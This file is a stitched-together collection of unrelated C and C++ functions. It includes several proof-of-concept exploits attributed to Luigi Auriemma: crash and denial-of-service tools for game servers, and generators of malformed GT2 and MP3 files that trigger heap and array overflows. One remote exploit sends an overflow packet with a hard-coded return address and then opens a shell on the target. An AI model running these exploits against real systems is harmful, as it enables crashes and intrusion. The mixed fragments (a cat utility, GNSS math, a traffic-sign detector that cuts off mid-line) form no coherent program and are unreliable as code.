int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct
sockaddr_in *peer, int err) {
int retry,
len;
if(in && !out) {
if(sendto(sd, in, insz, 0, (struct sockaddr *)peer,
sizeof(struct sockaddr_in))
< 0) std_err();
return(0);
}
if(in) {
for(retry = 2; retry; retry--) {
if(sendto(sd, in, insz, 0, (struct sockaddr *)peer,
sizeof(struct sockaddr_in))
< 0) std_err();
if(!timeout(sd, 1)) break;
}
if(!retry) {
if(!err) return(-1);
printf("\nError: socket timeout, no reply received\n\n");
exit(1);
}
} else {
if(timeout(sd, 3) < 0) return(-1);
}
len = recvfrom(sd, out, outsz, 0, NULL, NULL);
if(len < 0) std_err();
return(len);
}
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd;
u_short port = PORT;
u_char *buff;
setbuf(stdout, NULL);
fputs("\n"
"Pigeon server <= 3.02.0143 freeze "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\nUsage: %s <server> [port(%d)]\n"
"\n", argv[0], PORT);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("\n- target %s:%hu\n",
inet_ntoa(peer.sin_addr), port);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
buff = malloc(BUFFSZ);
if(!buff) std_err();
memset(buff, 'a', BUFFSZ);
buff[BUFFSZ - 5] = '|';
buff[BUFFSZ - 4] = '|';
buff[BUFFSZ - 3] = '1';
buff[BUFFSZ - 2] = '|';
buff[BUFFSZ - 1] = '|';
fputs("- send malformed data\n", stdout);
if(send(sd, buff, BUFFSZ, 0)
< 0) std_err();
close(sd);
fputs("- the server should be freezed, check it manually\n\n", stdout);
return(0);
}
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd;
u_short port = PORT;
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"Chris Moneymaker's World Poker Championship 1.0 buffer-overflow "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%d)]\n"
"\n", argv[0], port);
exit(1);
}
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
fputs("- check server: ", stdout);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\nError: server doesn't seem to work, I have received no data\n\n", stdout);
exit(1);
}
fputs("ok\n", stdout);
fputs("- send malformed data size\n", stdout);
send_chmpoker(sd, BOF, sizeof(BOF) - 1, 8, 3);
sleep(ONESEC);
close(sd);
fputs("- the server should be crashed, check it manually\n", stdout);
return(0);
}
int extract_fastfile(char * infilename, char * outfilename) {
FILE *fd,
*fdo = NULL;
uint32_t inlen,
outlen;
int i,
files;
char *file_input,
*file_output,
*file_offset;
setbuf(stdout, NULL);
setbuf(stderr, NULL);
file_input = infilename;
file_output = outfilename;
file_offset = "0x15";
printf("Extracting fastfile: %s\n", file_input);
fd = fopen(file_input, "rb");
if(!fd) std_err();
if(minzip > INSZ) minzip = INSZ;
if(minzip < 1) minzip = 1;
in = malloc(INSZ);
out = malloc(OUTSZ);
filebuff = malloc(FBUFFSZ);
if(!in || !out || !filebuff) std_err();
offset = get_num(file_offset); // do not skip, needed for buffseek
buffseek(fd, offset, SEEK_SET);
z.zalloc = (alloc_func)0;
z.zfree = (free_func)0;
z.opaque = (voidpf)0;
if(inflateInit2(&z, zipwbits) != Z_OK) zlib_err(Z_INIT_ERROR);
fdo = save_file(file_output);
unzip(fd, &fdo, &inlen, &outlen);
FCLOSE(fdo)
printf("\n"
"%u bytes compressed\n"
"%u bytes extracted\n",
inlen, outlen);
FCLOSE(fdo)
FCLOSE(fd)
inflateEnd(&z);
free(in);
free(out);
free(filebuff);
return(0);
}
static void report(char *label)
{
int e = errno;
std_err("cat: ");
std_err(label);
std_err(": ");
std_err(strerror(e));
std_err("\n");
excode = 1;
}
int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err, int z) {
static u8 *zbuff = NULL;
uLongf len;
int retry = 2;
if(!zbuff) {
zbuff = malloc(ZBUFFSZ);
if(!zbuff) std_err();
}
if(in) {
if(z) {
len = ZBUFFSZ;
compress2(zbuff, (void *)&len, in, insz, Z_BEST_COMPRESSION);
in = zbuff;
insz = len;
}
while(retry--) {
fputc('.', stdout);
if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
< 0) goto quit;
if(!out) return(0);
if(!timeout(sd, 1)) break;
}
} else {
if(timeout(sd, 3) < 0) retry = -1;
}
if(retry < 0) {
if(!err) return(-1);
printf("\nError: socket timeout, no reply received\n\n");
exit(1);
}
fputc('.', stdout);
len = recvfrom(sd, zbuff, ZBUFFSZ, 0, NULL, NULL);
if((int)len < 0) goto quit;
z = 0; // incoming zlib seems not active for the moment, I leave this stuff here for the future
if(z) {
if(uncompress(out, (void *)&outsz, zbuff, len) == Z_OK) {
len = outsz;
} else {
memcpy(out, zbuff, len);
}
} else {
memcpy(out, zbuff, len);
}
return(len);
quit:
if(err) std_err();
return(-1);
}
void scorched3d_send(int sd, u_char *pck, int len, u_char *buff, int buffsz) {
int tmp,
zlen;
zlen = zip(pck, len, buff, buffsz);
tmp = htonl(zlen + 4);
if(send(sd, (void *)&tmp, 4, 0) < 0) std_err();
tmp = htonl(len);
if(send(sd, (void *)&tmp, 4, 0) < 0) std_err();
if(send(sd, buff, zlen, 0) < 0) std_err();
}
void gs_info_udp(u_long ip, u_short port) {
struct sockaddr_in peer;
int sd,
len,
nt = 1;
u_char buff[2048],
*p1,
*p2;
peer.sin_addr.s_addr = ip;
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
if(sendto(sd, "\\status\\", 8, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\nError: socket timeout, no replies received. Probably the server doesn't support the Gamespy query protocol or the port is wrong\n\n", stdout);
close(sd);
exit(1);
}
len = recvfrom(sd, buff, sizeof(buff) - 1, 0, NULL, NULL);
if(len < 0) std_err();
buff[len] = 0x00;
p1 = buff;
while((p2 = strchr(p1, '\\'))) {
*p2 = 0x00;
if(!nt) {
if(!*p1) break;
printf("%30s: ", p1);
nt++;
} else {
printf("%s\n", p1);
nt = 0;
}
p1 = p2 + 1;
}
printf("%s\n\n", p1);
close(sd);
}
int main(int argc, char *argv[]) {
FILE *fd;
gt2_t gt2;
int i;
char *fname;
setbuf(stdout, NULL);
fputs("\n"
"libmikmod <= 3.2.2 and current CVS heap overflow with GT2 files "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <output_file.GT2>\n"
"\n", argv[0]);
exit(1);
}
fname = argv[1];
printf("- create file %s\n", fname);
fd = fopen(fname, "wb");
if(!fd) std_err();
gt2.gt2[0] = 'G';
gt2.gt2[1] = 'T';
gt2.gt2[2] = '2';
gt2.version = 4;
gt2.chunk_size = 0; // unused
cpy(gt2.module, "module_name");
cpy(gt2.comments, "author");
gt2.date_day = 1;
gt2.date_month = 1;
gt2.date_year = 2006;
cpy(gt2.tracker, "tracker");
gt2.speed = 6;
gt2.tempo = 300;
gt2.volume = 0;
gt2.voices = 0;
printf("- write GT2 header\n");
fwrite(>2, sizeof(gt2), 1, fd);
for(i = 0; i < gt2.voices; i++) fwi16(fd, 0);
printf("- build the XCOM header for exploiting the heap overflow\n");
fwmem(fd, "XCOM", 4);
fwi32(fd, 0); // unused
fwi32(fd, 0xffffffff); // bug here, 0xffffffff + 1 = 0
fwstr(fd, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa");
fclose(fd);
printf("- finished\n");
return(0);
}
u8 *wtcc_encrypt(u8 *filebuff, int filelen, int *retlen, int filever) {
uLongf zlen;
u32 //zlen,
bflen,
keylen = 0,
keytable = 0;
int dozip = 0;
u8 *buff,
*key = NULL;
zlen = filelen + (filelen / 1000) + 12; // must be at least 0.1% larger than sourceLen plus 12 bytes
buff = malloc(16 + zlen);
if(!buff) std_err(NULL);
printf("- XOR %u bytes with 0xeb\n", filelen);
xor(filebuff, filelen, 0xeb);
key = wtcc_filever_key(1, filever, &keylen, &keytable, &dozip);
if(customkey) {
key = customkey;
keylen = customkeylen;
}
if(dozip) {
printf("- zip %u bytes\n", filelen);
zlen = filelen;
compress2(buff + 16, &zlen, filebuff, filelen, Z_BEST_COMPRESSION);
bflen = zlen;
} else {
zlen = 0;
memcpy(buff + 16, filebuff, filelen);
bflen = filelen;
}
bflen = (bflen + 7) & ~7;
printf("- encrypt %u bytes\n", bflen);
wtcc_blowfish(key, keylen, keytable, buff + 16, bflen, BF_ENCRYPT);
printf(
"- file version %u\n"
"- blowfish size %u (%s)\n"
"- compressed size %u\n"
"- data size %u\n",
filever,
bflen, (bflen & 7) ? "wrong" : "correct",
(u32)zlen,
filelen);
put32(buff, 0xffffb10f);
put32(buff + 4, filever);
put32(buff + 8, filelen);
put32(buff + 12, zlen);
*retlen = 16 + bflen;
return(buff);
}
void read_sock(int sd, u_char *buff, int max) {
int t;
while(max) {
t = recv(sd, buff, max, 0);
if(t <= 0) std_err();
max -= t;
}
}
u_char *do_it_big(int size) {
u_char *s;
s = malloc(size + 1);
if(!s) std_err();
memset(s, 'a', size);
s[size] = 0;
return(s);
}
int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err) {
int retry,
len;
for(retry = 3; retry; retry--) {
if(sendto(sd, in, insz, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(!timeout(sd)) break;
}
if(!retry) {
if(!err) return(-1);
fputs("\nError: socket timeout, no reply received\n\n", stdout);
exit(1);
}
len = recvfrom(sd, out, outsz, 0, NULL, NULL);
if(len < 0) std_err();
return(len);
}
int main(int argc, char *argv[]) {
FILE *fd,
*fdo;
u8 *fin,
*fout;
fputs("QuakeLive PK3 decrypter "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage:\n"
" %s <infile> <outfile>\n"
"\n"
"Example:\n"
" %s encrypted/quakelive-map.pk3 decrypted/some-map.pk3\n"
"\n", argv[0], argv[0]);
exit(1);
}
fin = argv[1];
fout = argv[2];
printf("- open %s\n", fin);
fd = fopen(fin, "rb");
if(!fd) std_err();
printf("- create %s\n", fout);
if(check_overwrite(fout) < 0) exit(1);
fdo = fopen(fout, "wb");
if(!fdo) std_err();
quakelive_decrypt(fd, fdo);
fclose(fd);
fclose(fdo);
printf("- done\n");
return(0);
}
u8 *fd_read(u8 *name, int *fdlen) {
struct stat xstat;
FILE *fd;
int len,
memsize,
filesize;
u8 *buff;
if(!strcmp(name, "-")) {
printf("- open %s\n", "stdin");
filesize = 0;
memsize = 0;
buff = NULL;
for(;;) {
if(filesize >= memsize) {
memsize += 0x80000;
buff = realloc(buff, memsize);
if(!buff) std_err();
}
len = fread(buff + filesize, 1, memsize - filesize, stdin);
if(!len) break;
filesize += len;
}
buff = realloc(buff, filesize);
if(!buff) std_err();
} else {
printf("- open file \"%s\"\n", name);
fd = fopen(name, "rb");
if(!fd) std_err();
fstat(fileno(fd), &xstat);
filesize = xstat.st_size;
buff = malloc(filesize);
if(!buff) std_err();
fread(buff, filesize, 1, fd);
fclose(fd);
}
*fdlen = filesize;
return(buff);
}
int timeout(int sock, int secs) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = secs;
tout.tv_usec = 1000; // in case secs is 0
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
u8 *fd_read(u8 *name, int *fdlen) {
struct stat xstat;
FILE *fd;
u8 *buff;
printf("- open file %s\n", name);
fd = fopen(name, "rb");
if(!fd) std_err(NULL);
fstat(fileno(fd), &xstat);
buff = malloc(xstat.st_size);
fread(buff, xstat.st_size, 1, fd);
fclose(fd);
*fdlen = xstat.st_size;
return(buff);
}
static void output(char *buf, size_t count)
{
ssize_t n;
while (count > 0) {
n = write(STDOUT_FILENO, buf, count);
if (n <= 0) {
if (n < 0) fatal(STDOUT);
std_err("cat: standard output: EOF\n");
exit(1);
}
buf += n;
count -= n;
}
}
void fd_write(u_char *name, u_char *data, int datasz) {
FILE *fd;
printf("- create file %s\n", name);
fd = fopen(name, "rb");
if(fd) {
fclose(fd);
printf("- file already exists, do you want to overwrite it (y/N)?\n ");
fflush(stdin);
if(tolower(fgetc(stdin)) != 'y') exit(1);
}
fd = fopen(name, "wb");
if(!fd) std_err();
fwrite(data, datasz, 1, fd);
fclose(fd);
}
int main(int argc, char *argv[])
{
int i, fd;
i = 1;
while (i < argc && argv[i][0] == '-') {
char *opt = argv[i] + 1;
if (opt[0] == 0) break; /* - */
i++;
if (opt[0] == '-' && opt[1] == 0) break; /* -- */
while (*opt != 0) switch (*opt++) {
case 'u':
unbuffered = 1;
break;
default:
std_err("Usage: cat [-u] [file ...]\n");
exit(1);
}
}
if (i >= argc) {
copyout(STDIN, STDIN_FILENO);
} else {
while (i < argc) {
char *file = argv[i++];
if (file[0] == '-' && file[1] == 0) {
copyout(STDIN, STDIN_FILENO);
} else {
fd = open(file, O_RDONLY);
if (fd < 0) {
report(file);
} else {
copyout(file, fd);
close(fd);
}
}
}
}
output(obuf, (op - obuf));
return(excode);
}
int main(int argc, char *argv[]) {
FILE *fd;
int i;
u8 buff[1024],
*p;
setbuf(stdout, NULL);
fputs("\n"
"id3lib (devel CVS) array overflow "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: aluigi.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <output.MP3>\n"
"\n", argv[0]);
exit(1);
}
p = buff;
*p++ = 'I'; // "ID3"
*p++ = 'D';
*p++ = '3';
*p++ = 4; // ID3v2 4.0
*p++ = 0;
*p++ = 1 << 6; // flags: extended
p += w28(p, 0); // this->SetDataSize
p += w28(p, 0); // not used by id3lib
*p++ = 6; // extflagbytes
for(i = 0; i < 20; i++) {
*p++ = 0xcc;
}
printf("- create file %s\n", argv[1]);
fd = fopen(argv[1], "wb");
if(!fd) std_err();
fwrite(buff, 1, p - buff, fd);
fclose(fd);
printf("- done\n");
return(0);
}
/* ionosphere residuals ------------------------------------------------------*/
static int res_iono(const obsd_t *obs, int n, const double *azel,
const double *x, int nx, double *v, double *H, double *R)
{
double *sig,L1,L2,P1,P2,map;
int i,j,nv=0,sat;
sig=mat(1,2*n);
for (i=0;i<n;i++) {
sat=obs[i].sat;
L1=obs->L[0]*lam[0];
L2=obs->L[1]*lam[1];
P1=obs->P[0];
P2=obs->P[1];
if (L1==0||L2==0||P1==0||P2==0) continue;
/* ionosphere mapping function */
map=ionmapf(pos,azel+i*2);
/* residuals of ionosphere (geometriy-free) LC */
v[nv ]=(L1-L2)+map*x[II(sat)]-x[IB(sat)];
v[nv+1]=(P1-P2)-map*x[II(sat)];
/* partial derivatives */
for (j=0;j<nx;j++) H[nx*nv+j]=0.0;
H[nx*nv +II(sat)]=-map;
H[nx*nv +IB(sat)]=1.0;
H[nx*(nv+1)+IB(sat)]=map;
/* standard deviation of error */
sig[nv ]=std_err(azel);
sig[nv+1]=sig[nv]*RATIO_ERR;
nv+=2;
}
for (i=0;i<nv;i++) for (j=0;j<nv;j++) {
R[i+j*nv]=i==j?SQR(sig[i]):0.0;
}
free(sig);
return nv;
}
void fd_write(u8 *name, u8 *data, int datasz) {
FILE *fd;
u8 ans[16];
name = create_dir(name);
printf("- create file %s\n", name);
if(!overwrite) {
fd = fopen(name, "rb");
if(fd) {
fclose(fd);
printf("- file already exists, do you want to overwrite it (y/N/all)?\n ");
fflush(stdin);
fgets(ans, sizeof(ans), stdin);
if(ans[0] == 'a') overwrite = 1;
else if(ans[0] != 'y') exit(1); // terminate immediately
}
}
fd = fopen(name, "wb");
if(!fd) std_err(NULL);
fwrite(data, datasz, 1, fd);
fclose(fd);
}
u8 *create_dir(u8 *name) {
struct stat xstat;
int n,
namelen;
u8 *p;
namelen = strlen(name);
p = strchr(name, ':');
if(p) {
p++;
} else {
p = name;
}
if((*p == '/') || (*p == '\\')) p++;
for(; (p - name) < namelen; p++) {
n = strcspn(p, "/\\");
if(!n) continue;
p += n;
if(!*p) continue;
*p = 0;
if(stat(name, &xstat) < 0) {
printf("- create folder %s\n", name);
MAKEDIR(name);
} else if(!S_ISDIR(xstat.st_mode)) {
printf("\nError: %s is not a folder\n", name);
std_err("");
}
*p = PATHSLASH;
}
return(name);
}
int main(int argc, char *argv[]) {
unsigned char buffrecv[BUFFSZ],
buffsend[sizeof(BOF1) + 64],
challenge[16],
bug,
*bofstr,
*stri,
*strf;
struct sockaddr_in peer;
int sd,
err,
rlen,
bufflen,
proto;
unsigned long offset;
setbuf(stdout, NULL);
if(argc < 2) {
printf("\nUsage: %s <host> <port>\n\n", argv[0], PORT);
exit(1);
}
printf("OK team, follow my command.\n");
srand(time(NULL));
bofstr=BOF1;
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(atoi(argv[2]));
// offset=strtoul(argv[3],NULL,16);
peer.sin_family = AF_INET;
rlen = sizeof(peer);
offset=0x0804AE93; // call eax
printf("Using offset 0x%08x...\n",offset);
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
/* GET INFORMATIONS */
err = sendto(sd, INFO, sizeof(INFO) - 1, 0, (struct sockaddr *)&peer, rlen);
if(err < 0) std_err();
err = timeout2(sd);
if(err < 0) {
fputs("\nError: socket timeout\n", stdout);
exit(1);
}
err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
if(err < 0) std_err();
buffrecv[err] = 0x00;
proto = getproto(buffrecv);
showinfostring(buffrecv, err);
/* GET CHALLENGE NUMBER */
err = sendto(sd, GETCH, sizeof(GETCH) - 1, 0, (struct sockaddr *)&peer, rlen);
if(err < 0) std_err();
err = timeout2(sd);
if(err < 0) {
fputs("\nError: socket timeout\n", stdout);
exit(1);
}
err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
if(err < 0) std_err();
buffrecv[err] = 0x00;
stri = strchr(buffrecv, 0x20);
if(!stri) stri = buffrecv;
strf = strchr(stri + 1, 0x20);
if(!strf) strf = buffrecv + err;
*strf = 0x00;
strncpy(challenge, stri, 16);
printf("Challenge: %s\n", challenge);
bufflen = snprintf(buffsend,
sizeof(BOF1) + 64,
bofstr,
proto,
challenge,
(long)(rand() << 1) + (rand() & 0xf), /* 31bit */
(long)(rand() << 1) + (rand() & 0xf),
(long)(rand() << 1) + (rand() & 0xf),
(long)(rand() << 1) + (rand() & 0xf),
offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF,
offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF,
offset&0xFF,(offset>>8)&0xFF,(offset>>16)&0xFF,(offset>>24)&0xFF);
if(bufflen < 0) {
fputs("\nError: cannot allocate buffer in memory\n", stdout);
exit(1);
}
printf("Sending deadly packet ... stand by\n");
err = sendto(sd, buffsend, bufflen, 0, (struct sockaddr *)&peer, rlen);
if(err < 0) std_err();
err = timeout2(sd);
if(err < 0) {
fputs("\nResult: The remote server IS vulnerable!!!\n", stdout);
exec_sh(connect_sh(argv[1]));
return(0);
}
err = recvfrom(sd, buffrecv, BUFFSZ, 0, (struct sockaddr *)&peer, &rlen);
if(err < 0) std_err();
buffrecv[err] = 0x00;
printf("Connect: %s\n", buffrecv + 5);
close(sd);
fputs("\nResult: The server doesn't seems to be vulnerable\n\n", stdout);
return(0);
}
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd;
u_short port = PORT;
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"Netpanzer <= 0.8 endless loop "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%d)]\n"
"\n", argv[0], port);
exit(1);
}
if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);
fputs("- check server: ", stdout);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\nError: server doesn't seem to work, I have received no data\n\n", stdout);
exit(1);
} else {
fputs("ok\n", stdout);
}
fputs("- send malformed data size\n", stdout);
if(send(sd, "\x00\x00", 2, 0)
<= 0) std_err();
close(sd);
fputs("- check server status:\n", stdout);
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem vulnerable\n\n", stdout);
}
close(sd);
return(0);
}
//TODO: code here should be abstracted outside the app, modify tests accordingly
int main(int argc, char *argv[]) {
// Chec the number of arguments
if (argc != 2) {
std::cout << "********************************" << std::endl;
std::cout << "Usage of the code: ./traffic-sign-detection imageFileName.extension" << std::endl;
std::cout << "********************************" << std::endl;
return -1;
}
// Clock for measuring the elapsed time
std::chrono::time_point<std::chrono::system_clock> start, end;
start = std::chrono::system_clock::now();
// Read the input image - convert char* to string
std::string input_filename(argv[1]);
// Read the input image
cv::Mat input_image = cv::imread(input_filename);
// Check that the image has been opened
if (!input_image.data) {
std::cout << "Error to read the image. Check ''cv::imread'' function of OpenCV" << std::endl;
return -1;
}
// Check that the image read is a 3 channels image
CV_Assert(input_image.channels() == 3);
/*
* Conversion of the image in some specific color space
*/
// Conversion of the rgb image in ihls color space
cv::Mat ihls_image;
colorconversion::convert_rgb_to_ihls(input_image, ihls_image);
// Conversion from RGB to logarithmic chromatic red and blue
std::vector< cv::Mat > log_image;
colorconversion::rgb_to_log_rb(input_image, log_image);
/*
* Segmentation of the image using the previous transformation
*/
// Segmentation of the IHLS and more precisely of the normalised hue channel
// ONE PARAMETER TO CONSIDER - COLOR OF THE TRAFFIC SIGN TO DETECT - RED VS BLUE
int nhs_mode = 0; // nhs_mode == 0 -> red segmentation / nhs_mode == 1 -> blue segmentation
cv::Mat nhs_image_seg_red;
segmentation::seg_norm_hue(ihls_image, nhs_image_seg_red, nhs_mode);
//nhs_mode = 1; // nhs_mode == 0 -> red segmentation / nhs_mode == 1 -> blue segmentation
//cv::Mat nhs_image_seg_blue;
cv::Mat nhs_image_seg_blue = nhs_image_seg_red.clone();
//segmentation::seg_norm_hue(ihls_image, nhs_image_seg_blue, nhs_mode);
// Segmentation of the log chromatic image
// TODO - DEFINE THE THRESHOLD FOR THE BLUE TRAFFIC SIGN. FOR NOW WE AVOID THE PROCESSING FOR BLUE SIGN AND LET ONLY THE OTHER METHOD TO TAKE CARE OF IT.
cv::Mat log_image_seg;
segmentation::seg_log_chromatic(log_image, log_image_seg);
/*
* Merging and filtering of the previous segmentation
*/
// Merge the results of previous segmentation using an OR operator
// Pre-allocation of an image by cloning a previous image
cv::Mat merge_image_seg_with_red = nhs_image_seg_red.clone();
cv::Mat merge_image_seg = nhs_image_seg_blue.clone();
cv::bitwise_or(nhs_image_seg_red, log_image_seg, merge_image_seg_with_red);
cv::bitwise_or(nhs_image_seg_blue, merge_image_seg_with_red, merge_image_seg);
// Filter the image using median filtering and morpho math
cv::Mat bin_image;
imageprocessing::filter_image(merge_image_seg, bin_image);
cv::imwrite("seg.jpg", bin_image);
/*
* Extract candidates (i.e., contours) and remove inconsistent candidates
*/
std::vector< std::vector< cv::Point > > distorted_contours;
imageprocessing::contours_extraction(bin_image, distorted_contours);
/*
* Correct the distortion for each contour
*/
// Initialisation of the variables which will be returned after the distortion. These variables are linked with the transformation applied to correct the distortion
std::vector< cv::Mat > rotation_matrix(distorted_contours.size());
std::vector< cv::Mat > scaling_matrix(distorted_contours.size());
std::vector< cv::Mat > translation_matrix(distorted_contours.size());
for (unsigned int contour_idx = 0; contour_idx < distorted_contours.size(); contour_idx++) {
rotation_matrix[contour_idx] = cv::Mat::eye(3, 3, CV_32F);
scaling_matrix[contour_idx] = cv::Mat::eye(3, 3, CV_32F);
translation_matrix[contour_idx] = cv::Mat::eye(3, 3, CV_32F);
}
// Correct the distortion
std::vector< std::vector< cv::Point2f > > undistorted_contours;
imageprocessing::correction_distortion(distorted_contours, undistorted_contours, translation_matrix, rotation_matrix, scaling_matrix);
// Normalise the contours to be inside a unit circle
std::vector<double> factor_vector(undistorted_contours.size());
std::vector< std::vector< cv::Point2f > > normalised_contours;
initopt::normalise_all_contours(undistorted_contours, normalised_contours, factor_vector);
std::vector< std::vector< cv::Point2f > > detected_signs_2f(normalised_contours.size());
std::vector< std::vector< cv::Point > > detected_signs(normalised_contours.size());
// For each contours
for (unsigned int contour_idx = 0; contour_idx < normalised_contours.size(); contour_idx++) {
// For each type of traffic sign
/*
* sign_type = 0 -> nb_edges = 3; gielis_sym = 6; radius
* sign_type = 1 -> nb_edges = 4; gielis_sym = 4; radius
* sign_type = 2 -> nb_edges = 12; gielis_sym = 4; radius
* sign_type = 3 -> nb_edges = 8; gielis_sym = 8; radius
* sign_type = 4 -> nb_edges = 3; gielis_sym = 6; radius / 2
*/
Timer tmrSgnType("For signType");
optimisation::ConfigStruct_<double> final_config;
double best_fit = std::numeric_limits<double>::infinity();
//int type_sign_to_keep = 0;
for (int sign_type = 0; sign_type < 5; sign_type++) {
Timer tmrIteration(" for_signType_iter");
// Check the center mass for a contour
cv::Point2f mass_center = initopt::mass_center_discovery(input_image, translation_matrix[contour_idx],
rotation_matrix[contour_idx], scaling_matrix[contour_idx],
normalised_contours[contour_idx], factor_vector[contour_idx],
sign_type);
// Find the rotation offset
double rot_offset = initopt::rotation_offset(normalised_contours[contour_idx]);
// Declaration of the parameters of the gielis with the default parameters
optimisation::ConfigStruct_<double> contour_config;
// Set the number of symmetry
int gielis_symmetry = 0;
switch (sign_type) {
case 0:
gielis_symmetry = 6;
break;
case 1:
gielis_symmetry = 4;
break;
case 2:
gielis_symmetry = 4;
break;
case 3:
gielis_symmetry = 8;
break;
case 4:
gielis_symmetry = 6;
break;
}
contour_config.p = gielis_symmetry;
// Set the rotation matrix
contour_config.theta_offset = rot_offset;
// Set the mass center
contour_config.x_offset = mass_center.x;
contour_config.y_offset = mass_center.y;
Timer tmrOpt("\t for_signType_gielisOptimization");
// Go for the optimisation
Eigen::Vector4d mean_err(0,0,0,0), std_err(0,0,0,0);
optimisation::gielis_optimisation(normalised_contours[contour_idx], contour_config, mean_err, std_err);
mean_err = mean_err.cwiseAbs();
double err_fit = mean_err.sum();
if (err_fit < best_fit) {
best_fit = err_fit;
final_config = contour_config;
//type_sign_to_keep = sign_type;
}
}
Timer tmr2("Reconstruct contour");
// Reconstruct the contour
std::cout << "Contour #" << contour_idx << ":\n" << final_config << std::endl;
std::vector< cv::Point2f > gielis_contour;
int nb_points = 1000;
optimisation::gielis_reconstruction(final_config, gielis_contour, nb_points);
std::vector< cv::Point2f > denormalised_gielis_contour;
initopt::denormalise_contour(gielis_contour, denormalised_gielis_contour, factor_vector[contour_idx]);
std::vector< cv::Point2f > distorted_gielis_contour;
imageprocessing::inverse_transformation_contour(denormalised_gielis_contour, distorted_gielis_contour,
translation_matrix[contour_idx], rotation_matrix[contour_idx],
scaling_matrix[contour_idx]);
// Transform to cv::Point to show the results
std::vector< cv::Point > distorted_gielis_contour_int(distorted_gielis_contour.size());
for (unsigned int i = 0; i < distorted_gielis_contour.size(); i++) {
distorted_gielis_contour_int[i].x = (int) std::round(distorted_gielis_contour[i].x);
distorted_gielis_contour_int[i].y = (int) std::round(distorted_gielis_contour[i].y);
}
detected_signs_2f[contour_idx] = distorted_gielis_contour;
detected_signs[contour_idx] = distorted_gielis_contour_int;
}
end = std::chrono::system_clock::now();
std::chrono::duration<double> elapsed_seconds = end-start;
std::time_t end_time = std::chrono::system_clock::to_time_t(end);
std::cout << "Finished computation at " << std::ctime(&end_time)
